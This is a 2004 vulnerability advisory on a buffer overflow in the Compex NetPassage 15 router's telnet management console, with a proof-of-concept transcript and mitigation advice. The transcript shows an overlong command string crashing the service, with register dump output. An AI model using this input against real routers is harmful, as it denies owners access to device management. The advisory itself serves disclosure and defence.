by Tan Chew Keong
Release Date: 17 June 2004
Compex NetPassage 15 (NP15)
is a 5-Port BroadBand Internet Gateway manufactured by Compex. NP15 allows device management
either through a web interface or using telnet. A buffer overflow condition exists in NP15's telnet
management service that may be exploited by an authenticated user to deny access to the service.
Compex NetPassage 15 Router Manager Console Version: 2.74 Build 1000 Feb 1 2002, 17:45:55
To exploit this vulnerability, the attacker must first logon to the management console using telnet
(port 23). After logon, the attacker can supply an overly long command string as shown below. A
successful exploit will generate an error in the management service, thus disabling further access
to the management service via telnet.
Router Manager Console Version: 2.74 Build 1000 Feb 1 2002, 17:45:55
Please enter your password:********
Welcome !
Command>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaa
^ Syntax Error
show set ping delete reset
add enable disable download save
disconnect logout edit
instruction access
Exception next instruction address: 0x61616160
Machine Status Register: 0x08209032
Condition Register: 0x22200040
Task: 0x3012a8 "tTelnetSession0"
- Set strong passwords for console management.
- Ensure that only trusted users have access to console managment.
- Do not allow remote management via telnet on the WAN interface.
01 Jun 04 - Vulnerability Discovered
03 Jun 04 - Initial Vendor Notification (no reply)
17 Jun 04 - Public Release
For further questions and enquries, email them to the following.
Overall-in-charge: Tan Chew Keong
webmaster@security.org.sg
|
